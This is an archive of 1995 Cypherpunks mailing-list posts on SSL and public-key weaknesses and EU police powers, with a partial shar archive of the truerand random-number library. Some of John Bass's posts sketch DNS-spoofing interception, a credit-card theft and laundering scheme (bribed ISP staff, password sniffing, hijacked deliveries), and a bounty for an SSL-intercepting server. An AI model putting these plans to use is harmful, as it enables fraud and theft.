iQCVAwUBMG2E5E3Qo/lG0AH5AQHBngQAieD6OL+sVGbyqHAuTFlLL7i1gFOQ5TA3
dGOAACMqWZGfHYIKkSZxaNIm1NjvSqjFK/0w/tZCtZedJBtPtxnCXSGRgF8FW8RG
QfxR2V9fnpNRje/w7+uh/1JezN/KGv3kWJ7DR8yyEIKcJK/MyGhdCfHNLjgHRGv4
yuezjkFnD5w=
=R7+/
-----END PGP SIGNATURE-----

From sameer at c2.org Sat Sep 30 12:01:28 1995
From: sameer at c2.org (sameer)
Date: Sat, 30 Sep 95 12:01:28 PDT
Subject: Cypherpunks Press release
In-Reply-To: <199509300726.RAA28172@sweeney.cs.monash.edu.au>
Message-ID: <199509301855.LAA20507@infinity.c2.org>

>
> Except PGP skill doesn't equal PR skill, not to mention that there
> might be a geographical, time-zone or language barrier.
>
> Sometimes having a separate PR person is useful, even if it does
> tend to lead to the moronic statements salesdroids are infamous for.
> With care, this problem can be minimized.

	In which case the person in question can hire their own PR person. If Community ConneXion had the resources, we would hire a PR person, because I would rather spend my time writing code and implementing anonymous systems than writing press releases and talking to reporters.

>
> Only problem is, does anyone know of any other way to get our
> ideas to be accepted by Joe Sixpack?

	I don't expect The Mythical Joe Sixpack to accept my views.

> What is the essential difference between a journalist writing an
> article and a volunteer writing a press release?

	The difference between "speaking for" and "speaking about"

--
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
An Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org (or login as "guest")		sameer at c2.org

From jbass at dmsd.com Sat Sep 30 12:09:27 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:09:27 PDT
Subject: A new tack on breaking SSL streams and NetScape servers
Message-ID: <9509301909.AA10965@dmsd.com>

| From jbass Mon Sep 25 15:00:41 1995
| To: JohnCGreen at aol.com
| Subject: Re: Netscape bug, RSA patent, hacker challenge
| Cc: rmiug-discuss at rmiug.org, isig at netf.org
|
| On Thu, 21 Sep 1995 JohnCGreen at aol.com wrote:
| > Internet commerce is getting off to a slow start. One of the reasons is
| > nervousness on the part of the general public regarding the use of insecure
| > networks. I believe it is not in the industry's interest to have vendors
| > publicly pointing out flaws in competitors' products.
| [ ... part deleted ...]
| > I believe that as long as industry experts working for huge companies like
| > Sun and AT&T as well as executives of small companies like NetManage and
| > Community ConneXion continue to criticize publicly the security of
| > competitors' systems commerce will be very slow to develop.
| > - - -
| > Internet Marketing and Business Development Consultant
| > 21483 Old Mine Rd Tel: (408)353-1870
| > Los Gatos CA 95030 Internet: JohnCGreen at aol.com
|
| Most of us are employed directly or indirectly by somebody. The quotes
| involved were not derived from text under a press release letterhead
| by the employers of those involved. The press is certainly free to use
| the person's educational and employment credentials in citing the source.
| Your objections here are without merit, since the quotes were not
| officially released by the businesses involved and only serve to distract
| from the real problems.
|
| Internet commerce is getting off to a slow start for good reason. Encryption
| or not, using the internet in its current state for commerce is fundamentally
| insecure, and the commercial internet providers have failed to address the
| primary problems.
During a security discussion in the Colorado SuperNet | users group mailing list last spring Brad Huntting, one of CSN's lead | techinical specialists, made this remarkably clear in his posting on | 13 Mar 1995 23:55:46 in response to my posting regarding minimal security | expectations to do business on/over the internet. | | A clear line of attack for any site dealing with credit cards or other | valuable data would be to attack the authoritative name servers (and routes | to/thru DNS servers) to reroute the target hosts traffic thru a filter host | to skim off data transparently. Or more directly to watch /dev/nit somewhere | on the network where www clients or servers are active with this data. | | I am hardly an internet security expert, but also far from being a newbie | at this game. I often have a more fundamental perspective on these problems, | and in some cases very different levels of expectations. We are dealing with | areas where there is no single right and wrong way to solve the security | problem. But there are clearly certain technical flaws that MUST be addressed | FIRST, before any solution will be viable. | | [from my Mon, 13 Mar 95 21:43:46 -0700 posting to ug at csn.net] | | I start with 4 expectations about providers which are seldom met: | | 1) ISP's manage internal and external back bones in a secure mode. | This means that nobody except critical internal staff can snoop | customer traffic or program routers - by network design. | | 2) ISP's manage the bridge/routers and subnets for network customers | (dedicated/slip/ppp) with advertised routes/domains/MX service | as secure too. | | 3) They firewall the billing systems, key servers, and monitor | the security for them very carefully. | | 4) They have a relatively insecure interactive environment on it's own | subnet behind a bridge/router/etherswitch to issolate it from the | internal backbone. | | The CSN/Brad Huntting response was: | | >I dont believe any ISP's do this. "As secure"? 
This [...] is fantasy. | | With this model we can make some assertions (not necessaryly true today): | | A) Customer data between two full-time (#2 above) subscribers (of | atleast the same provider, and reasonably expected between major | providers) *SHOULD* be expected to be secure *AND* that they devote | the resources to insure that it remains secure. Without this | everyone using the internet to transact business is highly at risk. | | B) Mail service between two full-time (#2 above) subscribers (of | atleast the same provider, and reasonably expected between major | providers) *SHOULD* be expected to be secure. This is clearly not | true today since some providers use interactive customer systems | for mail servers - so fall back delivery via MX records drop mail | into an insecure environment. | | The CSN/Brad Huntting response was: | | > E-Mail? Secure? You are high... | | It's no wonder an increasing number of companies are all but disconnecting | from the internet. | | The interactive systems at providers sites are completely a different cow/pig | ... they are difficult to class as anything but unsecure/hostile since the | user base has *NO* controls. Anybody that pays their startup fees can get an | account and hack/crack for atleast a month. Running www, other clients or | servers which transact business in this environment is fundementally insecure. | Because of this, the home computer model over slip/ppp should be the only or | prefered way to do internet business. | | Any rational provider needs to firewall their "support" systems (routers, | billing systems, and key servers) from this interactive zoo, slip/ppp/dedicated | customers, and the rest of the internet. The Kevin Mitnick attack was pure | stupidity ... he left a trail to his apartment. The providers involved didn't | do enough to firewall their support systems. 
Dozens/hundreds of other hackers | and crackers are atleast smart enough to loop their telnet/rlogins thru foreign | sites that *WILL NOT* provide call/route trace data to the Feds and then loop | the service such that packet correlation within a provider can not be done. | Had Mitnick done this he would still be reaping havoc. Other probably are | still at it, untraceable. | | I have several friends that have been running mail order businesses via | WEB servers ... you can order audio CD's, Video's, software, Adult toys, | and other interesting things from them. They are also cracker targets since | they do business via credit cards from their systems. Unless somebody can | start making the core part of the network secure and drive the cracker | havens from the net, I would not be suprised if the credit card companies | start withdrawing authorization from these businesses. Some of the non-credit | card companies, like Pizza Hut will also get tired of the internet when | some SOB floods them with prank orders day in and day out ... | | Current "secure protocols" are hardly secure in an insecure environment, they | require atleast a certain trusted agent/transport domain to work. If we are | going to "cleanup the net", it is going to be with providers and users taking | responsiblity for securing the primary backbones and provider resources, then | removing the hostile users and havens from the net. | | Having safe-havens on the net where hackers from around the world can safely | telnet thru has to stop ... before business on the internet is practical. | Getting the ISP's to accept basic route/data security as part of their service | offering is manditory for any sucessful encryption scheme. NetScape's current | problems are just the tip of the iceberg. 
| | ----------- | John Bass | UNIX Consultant Development, Porting, Performance by Design | | | From jbass Mon Sep 25 16:48:29 1995 | To: isig at netf.org, rmiug-discuss at rmiug.org | Subject: encryption in an insecure environment | Status: O | | Since several Public Key and PGP supporters don't understand the basics | of their own offerings ... I'll provide the rebuttal publicly for the | rest of you who may have been confused by my last posting. | | Encryption security is only as good as the security of the "key(s)" involved. | How keys are transmitted is the weak link for network based encryption | security systems. | | First Public Key encryption is far better than "pretty good" as long as | you know the sending party *IS* using *YOUR* key. The problem is that | when one or more messengers are in the loop, they can keep the receipents | key and provide the sender with their own key. When they get the senders | message they can decode the text, then re-encode it with the key obtained | from the receipent before passing it along to the receipent. | | Using Public Key encryption over the internet therefore requires that the | messengers (ISP's and the commerical internet backbones) are trustworthy | in delivering keys and limiting data access. If any point in the network | allows a hacker to substitute keys and reencrypt messages, then communication | between the customer and vendor is insecure. Routers, bridges, and Domain | Name Servers become key targets and must be trusted and secure. This is not | true today. 
|
| John Bass
| UNIX Consultant Development, Porting, Performance by Design
|
| From jbass Tue Sep 26 20:46:01 1995
| To: rmiug-discuss at rmiug.org, isig at netf.org
| Subject: DNS role in an insecure network environment
| Status: O
|
| Since some folks here may not understand why Domain Name Servers
| and the routes to/from them must be secure I'll provide a short
| description of why attacking them, or their routing, can be used
| to attack a vendor's server system.
|
| Domain Name Service (DNS) has several critical roles in regard
| to supporting internet security. This opens the door for several
| interesting attacks.
|
| It is critical that the mapping of host.domain by a client system results
| in the internet address of the server host requested - and not that of
| some substituted server intercepting traffic for it.
|
| If an attacker can convince a client system to resolve requests for
| server.vendor.domain to the substituted server, then the attacker can
| forward the client's requests to the real server while skimming the
| data involved. There are several ways to do this ranging from directly
| attacking the DNS system to injecting substituted DNS replies into the
| network. Doing this on an ISP's interactive system simply requires
| gaining enough privilege to either edit/replace host name tables or
| forcing an entry into the network kernel cache. Since DNS entries are
| cached, the substituted server address can have a fairly long life. The
| substituted server can be any machine in the world ... either in a safe
| haven zone or another compromised site to protect the hacker's identity.
|
| Authentication often requires that given some client/server address
| that you can trust DNS services to map it to the correct host.domain
| name which is then compared with an access control list. Many network
| servers can be attacked by substituting a trusted site's name given the
| attacker's address.
|
| The reliance on DNS creates a house of cards out of internet security,
| particularly since the ISP's internal network and internet backbone
| is managed without explicit attention to data/routing/DNS security. The
| ISP's seem to think it's the user's problem ... without any viable solution.
|
| John
|
| From jbass Thu Sep 28 08:14:26 1995
| To: Steve Hultquist
| Subject: Re: DNS role in an insecure network environment
| Cc: rmiug-discuss at rmiug.org, isig at netf.org
| Status: O
|
| Steve,
|
| Let's recap this in brief. In the first three postings I formed a strong
| argument that a collection of technologies in current use and perceived
| as secure, have in fact several lines of attack related to the messenger
| problem of distributing public keys. Nobody has offered a rebuttal to
| this method of attack showing the assertions invalid.
|
| This assertion directly implies that current practice of using Public
| Key encryption with inband keys is flawed, independent of the merits
| of the encryption algorithm, key algorithm or key length.
|
| Independent of the merits of any encryption or authentication algorithm,
| accepted solutions to the messenger attack require the existence of
| either an out-of-band key or a secure communications channel. How secure
| the channel must be depends on several factors. At minimum it must have
| routing integrity, which is not currently the case, to prevent a third
| party from inserting a filter (messenger) into the data path. Preferably
| the data path would not be clear text at all.
|
| There are millions of customers and a large number of vendors accepting
| the current technology without the knowledge of its flaws.
|
| You jump in with two postings which attempt to discredit my assertions
| purely with the force of your reputation saying it ain't so, and offer
| your signature lines as proof. And then get highly personal and offended
| when I question your weak attack.
|
| There are solutions to the problem, but they are not in widespread use
| on the internet to protect WWW commerce. CryptoCards are neat, but they
| are not the solution for the WWW. Third party systems still have the
| messenger problem unless an out-of-band key exists or the communication
| channel is secure to start with.
|
| My business cards just say "consultant" ... I also have a few left that
| say "janitor" (for cleaning up other engineers' messes, and emptying the
| trash after my employees). I also have a few that simply say "owner",
| but I have never thought it quite right to run my 1-10 man shop with
| the title president, CEO, or whatever titles that are used by those
| with the real responsibility for running multi-million/billion dollar
| companies with hundreds/thousands of people's jobs/lives at stake.
|
|
| You say:
|
| I think the technology is well-understood and has to do with
| key escrow by trusted servers.
|
| and I say fine, but that doesn't help today's customers. The messenger
| problem still exists with dynamic in-band registration, an out-of-band
| key is still needed..
|
| Yes, it takes a little time to set up third-party
| key servers, but it's not *that* difficult. And, fortunately, it has
| nothing to do with major changes to things as fundamental as DNS.
|
| and I say fine, but that doesn't help today's customers. Nor did I advocate
| changes to DNS ... just cleaning up the security of the channels it operates
| over.
|
| I don't think [out-of-band] key management is that difficult.
|
| I don't think it is either, *IF* done by the ISP for the ISP's protection
| domain *AND* the ISP's implement an extended protection domain to cover
| the backbone and all ISP's. But that's not here today either
|
| Are you familiar with the current IETF working groups?
Would you
| like to provide us with an assessment of the various approaches, including
| IPv6 (which, by the way, we are demonstrating here at Networld+Interop this
| week: http://www.interop.net)?
|
| As I stated in my original post I don't claim to be an internet security expert.
| You do.
|
| The real point is that none of this protects today's customers and vendors.
| I am not going to beat my chest and hope some group can change the risks
| for www customers in the next year either. (But it would be nice)
|
| >Since current systems depend on messengers, they are flawed from
| >a security standpoint no matter how many million may be in use.
| >The NetScape encryption that was just broken was widely in use
| >and success by your definition ... by mine it was a failure due
| >to its flaws ... exploited or not.
|
| Hogwash. Netscape was broken because they screwed up their randomization
| routine. It has nothing to do with the inherent security of the design,
| other than the flawed randomization. These are the rumors I was talking about.
|
| (grin) then prove it. Disprove the messenger attack. This is not a complex
| theory or algorithm we are talking about. The thousand or so readers of
| these lists will sleep a lot better if you can.
|
| >And therein lies the crux of the problem, trusting people with your title
| >for security who claim to be experts, yet just stick their head in the sand ...
|
| You know, John, you are one of the most caustic people I have ever conversed
| with. You don't know me, other than our e-mail conversations, yet you
| continue to denigrate me in public. I won't talk about my background,
| except to say that none of my security implementations have been
| compromised, my clients recommend me to others, and I am well aware of those
| times I need to enlist other experts.
|
| Unlike you, John, I'm not perfect, and can use the assistance of others at
| times.
|
| Gee ...
for somebody that doesn't know me either you bring a lot of personal
| stabs into this. "stick their head in the sand" is pretty meek compared to
| your full on attack.
|
| >please explain to the rest of us how your CryptoCard can be used
| >to solve the problem for the rest of us that would like to wander
| >the Web and shop without physically registering our card
| >with each store.
|
| You'd only need to register it with a key server. But, you won't be
| convinced, will you, John?
|
| and several million readers installed on every PC, and several million more cards
| with unique ID's manufactured and distributed to users world wide, and the
| coding would have to have a trap door for the NSA and law enforcement which
| would soon become widely known by all cyber crooks and econo terrorists.
| (or copies of the server's database should some employee decide that a new
| name and foreign home and retirement plan was worth the price of walking out
| the front door with some extra in their pocket) Not every problem has
| a technical solution ... not even for technical secrets.
|
| >dream on and sleep well ...
|
| I sleep well almost every night. And so do my clients.
|
| It makes me wonder about yours. If you have any.
|
| cheap shot ... sleep on. (but I wonder about your ...)
|
| Cheers,
| ssh
| --
| Steve Hultquist Distributed Systems and Internet Engineering
| President, Worldwide Solutions, Inc. Boulder, Colorado
|
| John Bass
| Janitor, DMS Design ;-))
|
| From jbass Fri Sep 29 01:28:26 1995
| To: isig at netf.org, rmiug-discuss at rmiug.org
| Subject: How to get rich from this ...
| Status: R
|
|
| Security flaws for the most part are just fun toys. With WWW & credit cards
| we can really let our fingers do the walking. Thru the internet backbone
| travels thousands of credit cards with authorization data every day/hour/minute.
| Or you can be a little more selective and pick a state, city, or smaller
| geographical area by choosing which pipe to plug into.
|
| Where good old phone banks with people and the net differ - is a single
| electronically readable pipe of treasure outside the normal EFT security
| channels. This centralization of data is what makes it attractive *IF*
| you find a way to turn it into cash without getting caught or the risk of
| getting caught can be outweighed by the gains.
|
| How much can 5,000 credit cards be worth ... 1,000-3,000 each to the tune
| of say 10 million if you are thinking small. On a little bit more grand
| scale 10X or 100X is possible with some planning on how to get the money
| into a usable place. We are talking more money than can be obtained from
| even the biggest of bank or collectable robberies. I think that makes it
| a goal of at least somebody out there ... if not an unknown cyber crook,
| organized crime, revolutionaries, some third world government.
|
| Some planning is in order - how to plug into the pipe, how to get the
| money out. This is the fun part ;-)
|
| We could probably afford to give say $50K to some college kid working for
| the regional ISP to find out a router passwd or two and share them with us.
| Maybe we are a little more discreet and simply put in a job application with
| them for the summer, or we buy a few dozen very expensive routers and sell
| them cheap after installing a trap door in their firmware. Maybe we just
| do it the old fashioned way and crack the root passwd on the interactive server
| and leave a background process watching /dev/nit for router passwds around
| the time we know they are going to do some reconfiguration.
|
| Getting the money out is the real creative part. Certainly running down
| and taking out cash advances is out of the question - or at least boring.
|
| We could do it the simple way - for each card in a targeted city, binary
| search its limit by ordering various non-traceable commodities like Pentium
| CPU's, memory, jewelry, gold/silver coins for the card owners shipped to
| their homes - then hijack the FedX and UPS regional delivery trucks first
| thing in the morning. Since the goods are prepaid, it will probably take
| several days before they can figure out the magnitude of the deal. Probably
| time to do it a couple more times. Certainly doing say 50 at the same time
| could yield a diversified retirement income.
|
| Without the glamour are more tried and true ways - hire a few hundred
| college kids to start a chain of computer software stores. Build volume
| by selling exactly at operating costs - undercutting everybody. When the
| bank gets used to the credit card rate, hold a few loss leader sales to
| create some great peaks ... then dump the entire stolen credit card list
| spread out against all the stores over a week period - slamming the cash
| into places difficult to find and run like heck. With luck you may be able
| to shield your identity and be faceless after the fallout.
|
| Take a large portion of the earnings to the track, powerball offices,
| and your local bookie ... REALLY HIDE the rest. If you get caught nobody
| will have the foggiest idea of how much is in your retirement fund
| after writing a best selling crime series in the slammer. Hopefully
| they will allow notebook computers and ISDN lines in cells by then.
|
| Find your body double and do everything in their name and town -- that's
| FYI on the SLY of course ....
|
| Unlike others, I have a strong dislike for centralized key databases, they
| make too big a target for traditional sorts of penetration - the data is
| worth thousands of times more than you are likely to pay for it under the table.
|
| I am a strong supporter of Public Key for both private and commercial data
| protection ...
but you must be fully aware to protect the initial key. As
| used by most applications, the messenger attack is possible.
|
| have fun, hope you enjoyed this series.
|
| The Janitor :)

From jbass at dmsd.com Sat Sep 30 12:10:47 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:10:47 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301910.AA10970@dmsd.com>

Well guys and gals ... I spent some time reading documentation on the www servers for NetScape and Community ConneXion (c2.org). The "messenger attack" as described in my earlier posts regarding public key encryption and key management seems to apply to NetScape's SSL. I have a Fifty dollar bill for the first person to submit to the mail box nethack at dmsd.com a working Unix server (with cleartext session logs) which accepts all connections on a unix based host to the www port and redirects them to netscape.com leaving a clear text log of each session's SSL packets in /tmp by session. All entries become the property of DMS Design. The winner and I will submit a claim for one of Community ConneXion's "I HACKED NETSCAPE" tee shirts as a server hack. (Have Fun!!)

After a careful examination of NetScape's public documentation it appears that SSL which is based upon RSA's public key technology may be down for the count. The fall of SSL would doom NetScape's current claim of "Strong exportable cryptography for credit card-based financial transactions" as outlined in Taher Elgamal's (NetScape's Chief Scientist) white paper titled "COMMERCE ON THE INTERNET: CREDIT CARD PAYMENT APPLICATIONS OVER THE INTERNET" Version 1.00 dated July 14, 1995 which can be found on the www as http://home.netscape.com/newsref/std/credit.html. SSL doc can be found as http://home.netscape.com/newsref/std/SSL.html.

John L.
Bass
Owner, DMS Design

From shamrock at netcom.com Sat Sep 30 12:11:37 1995
From: shamrock at netcom.com (Lucky Green)
Date: Sat, 30 Sep 95 12:11:37 PDT
Subject: COE Document
Message-ID: <199509301909.PAA11718@book.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

In article , banisar at epic.org ("Dave Banisar") wrote:

Here are some thoughts.

[...]
> Recommendation No. R (95) 13
> Recommendations No. R (87) 15
> regulating the use of personal data in the police state and
> Recommendations No. R (89) 9 on computer-relating crime,

The countries of the EC are police states and admit to it in an official document.

[...]
> 3. During execution of a search, investigating authorities should have the
> power, subject to appropriate safeguards, to extend the search of other
> computer systems within their jurisdiction which are connected by means of
> a network and seize the data therein, provided immediate action is
> required.

If the computer to be searched is connected to the Internet, any other computer connected to the Internet and located in the same country may be searched as well without requiring a second warrant.

> 12. Specific obligations should be imposed on service providers who offer
> telecommunications services to the public, either through public or
> private networks, to provide information to identify the user, when so
> ordered by the competent investigating authority.

Remailers will be outlawed.

[...]
> V. Use of Encryption
> ---------------------
>
> 14. Measures should be considered to minimise the negative effects of the
> use of cryptography on the investigation of criminal offenses, without
> affecting its legitimate use more than is strictly necessary.

GAK is coming. The new world order is unmasked: a global police state. Folks, it is time to buy some rifles and lots of ammunition. Oh, I forgot, over there in Europe you can no longer buy any. Seems the political leaders have thought ahead.
- ---
[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMG2V5SoZzwIn1bdtAQG5qQF/R3iX89TlU3rRD6NeIIVMG2F7iF6SNpME
6MjNUABjfCmGRwl6llCAC/bDtc2zxndA
=pXsk
-----END PGP SIGNATURE-----

From jbass at dmsd.com Sat Sep 30 12:26:04 1995
From: jbass at dmsd.com (John L. Bass)
Date: Sat, 30 Sep 95 12:26:04 PDT
Subject: NetScape's dependence upon RSA down for the count!
Message-ID: <9509301925.AA11020@dmsd.com>

In case SSL packets are not available from NetScape homepage server, use the netscape server of your choice in the contest ... have fun, John

From mab at crypto.com Sat Sep 30 12:35:48 1995
From: mab at crypto.com (Matt Blaze)
Date: Sat, 30 Sep 95 12:35:48 PDT
Subject: my favorite random-numbers-in-software package (unix)
Message-ID: <199509301946.PAA15565@crypto.com>

About a week ago I posted my (Don Mitchell's really) truerand() routine for Unix. truerand() needs some post-processing before use; it cannot be used directly. Here's a more complete version; the main interface is randbyte(), which returns (in about a third of a second) one really random byte (based on 64 truerand() bits) that can be used directly. As an added bonus, the library also throws in a shs-2 function and the basic truerand() code.

The basic idea is that you exploit randomness in the drift between the processor clock and the rate at which interval timer interrupts occur. Such drift occurs even on idle processors. randbyte() assumes that there's at least about .4 bits of "entropy" per interrupt, which is (probably) a safe assumption on modern processors. Randomness introduced by the OS (scheduler, etc.) can add to the overall entropy, but shouldn't be relied upon by itself.
An advantage to this approach (using clock skew) is that the randomness doesn't depend on external events like user input, network traffic or processor load. That makes it especially attractive for generating keys on unattended servers, e.g., for generating Diffie-Hellman exponents. Note, however, that very (very) slow and heavily-loaded processors may not provide enough cycles to the truerand process between interrupts for these assumptions to hold. Also, all bets are off on processors that use a single clock source for both interval timing and CPU clocking.

This code is very BSD/SunOS-centric and is completely untested elsewhere. Read the comments for scary warnings about testing on your own platform before using it for anything serious like generating keys.

-matt

=======================cut here==============
#!/bin/sh
# This is a shell archive (produced by GNU sharutils 4.1).
# To extract the files from this archive, save it to some FILE, remove
# everything before the `!/bin/sh' line above, then type `sh FILE'.
#
# Existing files will *not* be overwritten unless `-c' is specified.
#
# This shar contains:
# length mode       name
# ------ ---------- ------------------------------------------
#   1270 -rw-r--r-- makefile
#   1246 -rw-r--r-- randbyte.c
#   2886 -rw-r--r-- truerand.c
#   7142 -rw-r--r-- shs.c
#    149 -rw-r--r-- randtest.c
#
touch -am 1231235999 $$.touch >/dev/null 2>&1
if test ! -f 1231235999 && test -f $$.touch; then
  shar_touch=touch
else
  shar_touch=:
  echo
  echo 'WARNING: not restoring timestamps.  Consider getting and'
  echo "installing GNU \`touch', distributed in GNU File Utilities..."
  echo
fi
rm -f 1231235999 $$.touch
#
# ============= makefile ==============
if test -f 'makefile' && test X"$1" != X"-c"; then
  echo 'x - skipping makefile (file already exists)'
else
  echo 'x - extracting makefile (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'makefile' &&
# makefile for librand
# tested on Sparc-20 (SunOS 4.x) and P100 (BSDI) only.
# You're on your own elsewhere.  Read the comments for scary warnings.
#
# Usage: int randbyte();
#
#* The authors of this software are Don Mitchell, Matt Blaze & Jack Lacy.
#* Copyright (c) 1995 by AT&T.
#* Permission to use, copy, and modify this software without fee
#* is hereby granted, provided that this entire notice is included in
#* all copies of any software which is or includes a copy or
#* modification of this software and in all copies of the supporting
#* documentation for such software.
#*
#* This software may be subject to United States export controls.
#*
#* THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
#* WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
#* REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
#* OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X
SRCS=randbyte.c truerand.c shs.c
OBJS=randbyte.o truerand.o shs.o
CC=gcc
CFLAGS= # No -O in CFLAGS!  On some compilers, this optimizes out the counter...
X
librand.a: $(OBJS)
X	ar rcv librand.a $(OBJS)
X	ranlib librand.a
X
randtest: randtest.c $(SRCS)
X	cc -DDEBUGRND randtest.c $(SRCS) -o randtest
X
librand.shar: makefile $(SRCS) randtest.c
X	shar makefile $(SRCS) randtest.c > librand.shar
SHAR_EOF
  $shar_touch -am 0930150995 'makefile' &&
  chmod 0644 'makefile' ||
  echo 'restore of makefile failed'
  shar_count="`wc -c < 'makefile'`"
  test 1270 -eq "$shar_count" ||
    echo "makefile: original size 1270, current size $shar_count"
fi
# ============= randbyte.c ==============
if test -f 'randbyte.c' && test X"$1" != X"-c"; then
  echo 'x - skipping randbyte.c (file already exists)'
else
  echo 'x - extracting randbyte.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'randbyte.c' &&
/*
X * Random byte interface to truerand()
X * Matt Blaze 5/95
X * eight really random bits
X * usage:
X *	unsigned char r; int randbyte();
X *	r=randbyte();
X * randbyte() takes about .3 seconds on most machines.
X */
/*
X * The author of this software is Matt Blaze.
X * Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
#include <stdio.h>	/* printf() under -DDEBUGRND */
X
/*
X * Two raw truerand() words (about 16 bits of entropy each, see truerand.c)
X * are whitened through SHS; the first byte of the digest is returned.
X */
int randbyte()
{
X	unsigned long truerand();
X	unsigned char *shs();
X	unsigned long r[2];
X	unsigned char *hash;
X
X	r[0]=truerand(); r[1]=truerand();
X	hash = shs(r,sizeof(r));
#ifdef DEBUGRND
X	printf("%011o %011o %02x\n",r[0],r[1],*hash & 0xff);
#endif
X	return ((int) (*hash)) & 0xff;
}
SHAR_EOF
  $shar_touch -am 0930145795 'randbyte.c' &&
  chmod 0644 'randbyte.c' ||
  echo 'restore of randbyte.c failed'
  shar_count="`wc -c < 'randbyte.c'`"
  test 1246 -eq "$shar_count" ||
    echo "randbyte.c: original size 1246, current size $shar_count"
fi
# ============= truerand.c ==============
if test -f 'truerand.c' && test X"$1" != X"-c"; then
  echo 'x - skipping truerand.c (file already exists)'
else
  echo 'x - extracting truerand.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'truerand.c' &&
/*
X * Physically random numbers (very nearly uniform)
X * D. P. Mitchell
X * Modified by Matt Blaze 2/95
X */
/*
X * The authors of this software are Don Mitchell and Matt Blaze.
X * Copyright (c) 1995 by AT&T.
X * Permission to use, copy, and modify this software without fee
X * is hereby granted, provided that this entire notice is included in
X * all copies of any software which is or includes a copy or
X * modification of this software and in all copies of the supporting
X * documentation for such software.
X *
X * This software may be subject to United States export controls.
X *
X * THIS SOFTWARE IS BEING PROVIDED "AS IS", WITHOUT ANY EXPRESS OR IMPLIED
X * WARRANTY.  IN PARTICULAR, NEITHER THE AUTHORS NOR AT&T MAKE ANY
X * REPRESENTATION OR WARRANTY OF ANY KIND CONCERNING THE MERCHANTABILITY
X * OF THIS SOFTWARE OR ITS FITNESS FOR ANY PARTICULAR PURPOSE.
X */
X
/*
X * WARNING: depending on the particular platform, truerand() output may
X * be biased or correlated.  In general, you can expect about 16 bits of
X * "pseudo-entropy" out of each 32 bit word returned by truerand(),
X * but it may not be uniformly diffused.  You should therefore run
X * the output through some post-whitening function (like MD5 or DES or
X * whatever) before using it to generate key material.  (RSAREF's
X * random package does this for you when you feed truerand() bits to the
X * seed input function.)
X *
X * Test these assumptions on your own platform before fielding a system
X * based on this software or these techniques.
X *
X * This software seems to work well (at 16 bits per truerand() call) on
X * a Sun Sparc-20 under SunOS 4.1.3 and on a P100 under BSDI 2.0.  You're
X * on your own elsewhere.
X */
X
/* header names were lost in the archived copy; these are the ones the code uses */
#include <stdio.h>	/* perror() */
#include <signal.h>
#include <setjmp.h>
#include <sys/types.h>
#include <sys/time.h>	/* setitimer(), timerclear() */
X
static jmp_buf env;
/* volatile: the counter is bumped in a tight loop and read after longjmp();
X * without it the compiler may keep it in a register or drop the loop entirely */
static volatile unsigned count;
static unsigned ocount;
static unsigned buffer;
X
/* arm a one-shot 16.665 ms real-time interval timer */
static void tick()
{
X	struct itimerval it, oit;
X
X	timerclear(&it.it_interval);
X	it.it_value.tv_sec = 0;
X	it.it_value.tv_usec = 16665;
X	if (setitimer(ITIMER_REAL, &it, &oit) < 0)
X		perror("tick");
}
X
/* SIGALRM handler: if the loop has run, escape to roulette(); else re-arm */
static void interrupt(sig)
int sig;
{
X	if (count)
X		longjmp(env, 1);
X	(void) signal(SIGALRM, interrupt);
X	tick();
}
X
/* spin until the alarm fires; fold the low bits of the count into buffer */
static unsigned long roulette()
{
X	if (setjmp(env)) {
X		count ^= (count>>3) ^ (count>>6) ^ ocount;
X		count &= 0x7;
X		ocount=count;
X		buffer = (buffer<<3) ^ count;
X		return buffer;
X	}
X	(void) signal(SIGALRM, interrupt);
X	count = 0;
X	tick();
X	for (;;)
X		count++;	/* about 1 MHz on VAX 11/780 */
}
X
/* eleven spins of 3 bits each, i.e. one 32 bit word in about 0.18 s */
unsigned long truerand()
{
X	count=0;
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	(void) roulette();
X	return roulette();
}
X
/* uniform value in [0, n): rejection sampling over the 31 bit range */
int n_truerand(n)
int n;
{
X	int slop, v;
X
X	slop = 0x7FFFFFFF % n;
X	do {
X		v = truerand() >> 1;
X	} while (v <= slop);
X	return v % n;
}
SHAR_EOF
  $shar_touch -am 0930143395 'truerand.c' &&
  chmod 0644 'truerand.c' ||
  echo 'restore of truerand.c failed'
  shar_count="`wc -c < 'truerand.c'`"
  test 2886 -eq "$shar_count" ||
    echo "truerand.c: original size 2886, current size $shar_count"
fi
# ============= shs.c ==============
if test -f 'shs.c' && test X"$1" != X"-c"; then
  echo 'x - skipping shs.c (file already exists)'
else
  echo 'x - extracting shs.c (text)'
  sed 's/^X//' << 'SHAR_EOF' > 'shs.c' &&
/*
X * The authors of this software are Jim Reeds and Jack Lacy
X * Copyright (c) 1992, 1994 by AT&T.
